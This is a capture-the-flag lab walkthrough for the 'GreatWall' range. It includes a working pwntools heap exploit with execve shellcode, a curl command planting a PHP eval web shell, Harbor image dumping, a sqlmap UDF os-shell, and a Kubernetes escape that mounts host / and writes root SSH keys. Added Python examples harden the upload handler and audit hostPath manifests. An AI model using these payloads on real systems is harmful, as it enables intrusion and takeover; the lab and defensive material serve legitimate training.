春秋云境 (Chunqiu Yunjing) - GreatWall

Takeaways

1. Kubernetes unauthenticated access: see 浅析K8S各种未授权攻击方法 (an overview of the various unauthenticated attack techniques against K8s)

Topology

[topology diagram]

flag1

TP5 (ThinkPHP 5) RCE for the foothold, then fscan from the compromised host:

[+] ftp 172.28.23.26:21:anonymous 
[->]OASystem.zip

[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2

flag3

Spring Boot heapdump + Shiro

http://172.28.23.33:8080/actuator/heapdump

The heapdump contains the Shiro key; the cipher is in AES mode:

AZYyIgMYhG6/CzIJlvpR2g==

A high port, 59696, is serving an ELF binary, /home/ops01/HashNote; time to pwn it.

from pwn import *

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')
p = remote('172.28.23.33', 59696)

# Menu helpers: all payloads are bytes so the script runs under Python 3 pwntools.
def send_command(command):
    p.sendlineafter(b': ', str(command).encode())

def add_entry(key, value):
    send_command(1)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)

def get_entry(key):
    send_command(2)
    p.sendlineafter(b'Key: ', key)

def update_entry(key, value):
    send_command(3)
    p.sendlineafter(b'Key: ', key)
    p.sendlineafter(b'Data: ', value)

def set_username(value):
    send_command(4)
    p.sendafter(b'New username: ', value)

# Login
p.sendlineafter(b'Username: ', b'123')
p.sendlineafter(b'Password: ', b'freep@ssw0rd:3')

add_entry(b'aabP', b'aaaaaaaa')
add_entry(b'aace', b'C' * 0xc0)

sc = [
    b'\x6a\x3b',                                  # push 0x3b
    b'\x58',                                      # pop rax
    b'\x99',                                      # cdq
    b'\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68',  # movabs rbx, 0x68732f6e69622f2f
    b'\x53',                                      # push rbx
    b'\x48\x89\xe7',                              # mov rdi, rsp
    b'\x52',                                      # push rdx
    b'\x57',                                      # push rdi
    b'\x48\x89\xe6',                              # mov rsi, rsp
    b'\x0f\x05',                                  # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10

def arbitrary_read(addr):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)

    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += b'aahO'.ljust(0x10, b'\x00')
    fake_obj += p64(addr) + p64(8) + b'aaaaaaaa'

    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, b'\x00')
    set_username(payload)
    get_entry(b'aahO')

def arbitrary_write(addr, data):
    payload = p64(fake_obj_addr)
    payload += p64(0xdeadbeef)
    fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
    fake_obj += b'aahO'.ljust(0x10, b'\x00')
    fake_obj += p64(addr) + p64(len(data)) + b'aaaaaaaa'
    payload += fake_obj
    payload += shellcode
    payload = payload.ljust(128, b'\x00')
    set_username(payload)
    update_entry(b'aahO', data)

# Leak a stack address via environ
environ = 0x5e4c38
arbitrary_read(environ)
stack_addr = u64(p.recvuntil(b'\x7f', drop=False)[-6:].ljust(8, b'\0'))
success('stack_addr: %#x' % stack_addr)

# Gadgets
rdi = 0x0000000000405e7c
rsi = 0x000000000040974f
rax = 0x00000000004206ba
rdx_rbx = 0x000000000053514b
shr_eax_2 = 0x0000000000523f2e
syscall_ret = 0x00000000004d9776

payload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)

arbitrary_write(stack_addr - 0x210, payload)
p.sendline(b'uname -ar')
p.interactive()

flag2

Auditing the source downloaded from FTP (OASystem.zip) reveals an arbitrary file write that lets you drop a web shell:

curl -X POST -d "imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4=" "http://172.28.23.26/uploadbase64.php"
{"src":"upload/2025-05-26-6834854461dbb.php"}
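The request above works because the server derives the saved extension from the client-supplied MIME type in the data URI: `image/php` becomes a `.php` file. As an added example (not the target's PHP source, which the page does not show, and not part of the original writeup), the Python below reconstructs that flawed logic next to a hardened handler: the type must be in an allow-list, the extension comes from that list rather than from the request, the decoded bytes must carry the matching magic header, and the stored filename is server-generated. The PNG and fake-PNG inputs are constructed; the first input is the request body from the curl command above.

```python
import base64
import binascii
import re
import secrets

# Extensions the server will ever write, keyed by the only MIME types it accepts.
ALLOWED_TYPES = {"image/png": "png", "image/jpeg": "jpg", "image/gif": "gif"}

# Leading bytes the decoded body must have before we believe the declared type.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
}

DATA_URI_RE = re.compile(r"^data:([A-Za-z0-9.+-]+/[A-Za-z0-9.+-]+);base64,(.*)$", re.S)


def parse_data_uri(value):
    """Split 'data:<mime>;base64,<payload>' into (mime, payload) or raise ValueError."""
    m = DATA_URI_RE.match(value.strip())
    if not m:
        raise ValueError("not a base64 data URI")
    return m.group(1).lower(), m.group(2)


def vulnerable_extension(value):
    """Re-creation (assumed, not the target's code) of the flawed logic inferred from
    the request/response above: the extension is simply the MIME subtype, so
    'image/php' yields a .php file."""
    mime, _ = parse_data_uri(value)
    return mime.split("/", 1)[1]


def hardened_upload(value):
    """Return (extension, decoded_bytes) only for a genuine allowed image; raise otherwise."""
    mime, payload = parse_data_uri(value)
    ext = ALLOWED_TYPES.get(mime)
    if ext is None:
        raise ValueError(f"content type {mime!r} is not an allowed image type")
    try:
        raw = base64.b64decode(payload, validate=True)
    except binascii.Error as e:
        raise ValueError("payload is not valid base64") from e
    if not raw.startswith(MAGIC[mime]):
        raise ValueError("decoded bytes do not match the declared image type")
    return ext, raw


def storage_name(ext):
    """Server-chosen random filename; nothing from the client reaches the path."""
    return f"upload/{secrets.token_hex(16)}.{ext}"


def classify(value):
    """Convenience wrapper: 'accepted:<ext>' or 'rejected:<reason>'."""
    try:
        ext, _ = hardened_upload(value)
        return f"accepted:{ext}"
    except ValueError as e:
        return f"rejected:{e}"


# The request body from the page's curl command.
WEBSHELL_URI = "data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4="
# Constructed: a PNG signature padded with zero bytes (not a real image, but it
# carries the right magic so the type check passes).
PNG_URI = "data:image/png;base64," + base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16).decode()
# Constructed: declares PNG but carries text, so the magic-byte check must reject it.
FAKE_PNG_URI = "data:image/png;base64," + base64.b64encode(b"<?php echo 1; ?>").decode()


if __name__ == "__main__":
    print("vulnerable handler would write extension:", vulnerable_extension(WEBSHELL_URI))
    for uri in (WEBSHELL_URI, PNG_URI, FAKE_PNG_URI):
        print(uri[:30], "->", classify(uri))
```

The magic-byte check matters on its own: without it, a request declaring `image/png` with PHP in the body would still be written with a `.png` extension, which is harmless only as long as the web server never executes that path; the allow-listed extension plus the server-generated name is what removes the attacker's control over where and as what the file lands.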

AntSword (蚁剑) to bypass disable_functions, then a SUID binary to read the flag:

/usr/bin/base32 /flag02.txt

The host has two NICs; scan the second network and chain proxies through it (multi-hop):

172.22.14.37 K8s
172.22.14.46 Harbor

flag5

Harbor CVE-2022-46463 (unauthenticated access): list all images and pull the secret image:

python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

./caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt

flag6

Pull the projectadmin image:

python harbor.py http://172.22.14.46/ --dump project/projectadmin --v2

It contains ProjectAdmin-0.0.1-SNAPSHOT.jar; unpacking it and reading the config file yields MySQL credentials, then UDF privilege escalation:

sqlmap.py -d "mysql://root:[email protected]:3306/mysql" --os-shell 


flag4

172.22.14.37 has ports 10250 and 2379 open; probing 6443 shows the Kubernetes API server accepts unauthenticated requests:

https://172.22.14.37:6443

Download kubectl: https://dl.k8s.io/release/v1.30.0/bin/windows/amd64/kubectl.exe

List pods:

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods


Inspect the pod:

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ describe pod nginx-deployment-58d48b746d-d6x8t

Modelled on it, write an nginx deployment YAML that mounts the host's / into the container:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

Deploy the pod:

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml

List pods:

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods

Exec into the container:

kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-szx96 /bin/bash

Write an SSH public key onto the host through the mount:

ssh-keygen -t rsa -b 4096
echo "ssh-rsa AAAAB3NzaC..." > /mnt/root/.ssh/authorized_keys

SSH in and find the flag in MySQL.
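Two things made the chain above possible: an API server that answers anonymous requests (so `--anonymous-auth=false` and proper RBAC on the 6443 endpoint are the first fix), and a cluster that accepted a pod mounting the host's `/` via hostPath. The Pod Security Standards `baseline` profile already forbids hostPath volumes, but the logic is simple enough to run as a pre-admission check in CI or a validating webhook. The following is an added example, not part of the original writeup or of kubectl: it audits manifests as Python dicts in the shape `yaml.safe_load` returns (the YAML library is omitted so it runs offline). `EVIL_DEPLOYMENT` reproduces the `evil.yaml` above; the other two manifests and the sensitive-path list are constructed for illustration.

```python
import posixpath

# Host paths whose exposure to a pod is treated as HIGH. Mounting "/" (as evil.yaml
# does) hands the pod the entire host filesystem, including /root/.ssh.
SENSITIVE_HOST_PATHS = (
    "/", "/etc", "/root", "/home", "/proc", "/sys", "/dev",
    "/var/run/docker.sock", "/run/containerd", "/var/lib/kubelet",
)

WORKLOAD_KINDS = {"Deployment", "StatefulSet", "DaemonSet", "ReplicaSet", "Job"}


def pod_spec(manifest):
    """Return the PodSpec dict for a Pod or for any workload wrapping a pod template."""
    kind = manifest.get("kind")
    if kind == "Pod":
        return manifest.get("spec", {})
    if kind in WORKLOAD_KINDS:
        return manifest.get("spec", {}).get("template", {}).get("spec", {})
    if kind == "CronJob":
        return (manifest.get("spec", {}).get("jobTemplate", {})
                .get("spec", {}).get("template", {}).get("spec", {}))
    raise ValueError(f"unsupported kind {kind!r}")


def is_sensitive_host_path(path):
    """Normalise first so '/etc/../' is recognised as '/'."""
    norm = posixpath.normpath(path or "/")
    if norm == "/":
        return True
    return any(norm == s or norm.startswith(s + "/")
               for s in SENSITIVE_HOST_PATHS if s != "/")


def audit(manifest):
    """Return a list of finding strings; an empty list means nothing risky was found."""
    spec = pod_spec(manifest)
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    findings = []

    # Record which container mounts which volume so a hostPath finding says where it lands.
    mounts = {}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"HIGH {name}: container {c['name']} runs privileged")
        for vm in c.get("volumeMounts", []):
            mounts.setdefault(vm["name"], []).append((c["name"], vm["mountPath"]))

    for v in spec.get("volumes", []):
        host = v.get("hostPath")
        if host is None:
            continue
        path = host.get("path", "")
        level = "HIGH" if is_sensitive_host_path(path) else "MEDIUM"
        targets = ", ".join(f"{c}:{mp}" for c, mp in mounts.get(v["name"], [])) or "unmounted"
        findings.append(f"{level} {name}: hostPath {path!r} via volume {v['name']} -> {targets}")

    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"HIGH {name}: {flag} is enabled")
    return findings


def should_block(manifest):
    """Admission decision: reject anything with a HIGH finding."""
    return any(f.startswith("HIGH ") for f in audit(manifest))


# The page's evil.yaml, as yaml.safe_load would return it.
EVIL_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "nginx-deployment", "labels": {"app": "nginx"}},
    "spec": {"replicas": 1, "selector": {"matchLabels": {"app": "nginx"}},
             "template": {"metadata": {"labels": {"app": "nginx"}},
                          "spec": {"containers": [{"name": "nginx", "image": "nginx:1.8",
                                                   "volumeMounts": [{"mountPath": "/mnt", "name": "test-volume"}]}],
                                   "volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}]}}},
}

# Constructed benign variant: the same deployment backed by an emptyDir instead.
SAFE_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "nginx-safe"},
    "spec": {"replicas": 1, "selector": {"matchLabels": {"app": "nginx"}},
             "template": {"metadata": {"labels": {"app": "nginx"}},
                          "spec": {"containers": [{"name": "nginx", "image": "nginx:1.8",
                                                   "volumeMounts": [{"mountPath": "/mnt", "name": "scratch"}]}],
                                   "volumes": [{"name": "scratch", "emptyDir": {}}]}}},
}

# Constructed pod that is risky in two other ways a webhook should catch.
PRIV_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "debug"},
    "spec": {"hostPID": True,
             "containers": [{"name": "shell", "image": "busybox",
                             "securityContext": {"privileged": True}}]},
}

if __name__ == "__main__":
    for m in (EVIL_DEPLOYMENT, SAFE_DEPLOYMENT, PRIV_POD):
        verdict = "BLOCK" if should_block(m) else "allow"
        print(m["metadata"]["name"], verdict, audit(m))
```

The check deliberately inspects the pod template of every workload kind rather than only `Pod` objects, because the escape above was applied as a Deployment; a webhook that only looked at bare pods would have let it through.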
